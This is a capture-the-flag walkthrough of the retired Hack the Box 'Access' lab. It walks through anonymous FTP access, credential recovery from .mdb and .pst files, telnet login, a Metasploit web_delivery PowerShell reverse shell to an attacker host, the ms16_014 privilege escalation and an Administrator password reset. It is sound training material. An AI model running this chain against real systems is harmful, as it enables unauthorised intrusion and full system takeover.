Hack the Box Access: Walkthrough
Today we are going to solve another CTF challenge “Access”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.98.
- Network scanning (nmap).
- Logging in FTP using Anonymous Login.
- Using strings to read contents of the .mdb file.
- Unzipping Zip file using 7z.
- Using readpst to read the contents of the .pst file.
- Finding Login Credentials
- Logging into Telnet.
- Finding the first flag user.txt
- Using web delivery module to create PowerShell code.
- Getting Meterpreter.
- Using exploit suggester of Metasploit.
- Getting Root Access.
- Changing the Administrator password using net user.
- Reading Our Final flag root.txt
Let’s start off with scanning the network to find our target.
nmap -p- -A 10.10.10.98
The first thing that got our attention is that we have anonymous access to the ftp server. Let’s login and see what we find.
After successfully logging into FTP server, we have enumerated directories from where we have downloaded two files Access Control.zip and backup.mdb. They might come in handy later on.
When we tried to unzip the zip file found out that it was password protected. So we tried to open the backup.mdb file and found a password to the zip file.
strings backup.mdb | grep access
Once we have obtained the password for the Access Control.zip. Time to unzip it. After unzipping we saw its a .pst which is a Microsoft Exchange Format for mailboxes. Using readpst it converted the file into the .mbox format.
7z x Access\ Control.zip readpst 'Access Control.pst'
Let’s read the contents of the Access Control.mbox.
less 'Access Control.mbox'
After reading the contents, we saw that user credentials that surely going to help us to move ahead.
Username- security Password- 4Cc3ssC0ntr0ller
Let’s login into telnet using our new credentials. After enumerating through directories, we have found our first flag.
telnet 10.10.10.98 dir cd Desktop type user.txt
Let’s create a shellcode generated via the web delivery module of Metasploit.
use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 10.10.14.6 exploit
Now we will execute the PowerShell code generated via the web delivery module.
We have successfully got the meterpreter. Moving forward.
getuid getsystem sysinfo
After that, we have used exploit suggester which has given us all the possible exploits for the operating system of the Victims system.
use post/multi/recon/local_exploit_suggester set session 1 exploit
Using the exploit ms16_014_wmirecv_notif of Metasploit.
use exploit/windows/local/ms16_014_wmi_recv_notif set lhost 10.10.14.6 set session 1 set lport 1234 exploit
oh yeah! We have got the root access.
Now we changed the password for Administrator because we can use it to login via telnet.
net user net user Administrator Ignite@123
Here we successfully logged in via Telnet and found our final flag.
telnet 10.10.10.98 login: administrator password: Ignite@123 cd Desktop type root.txt
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here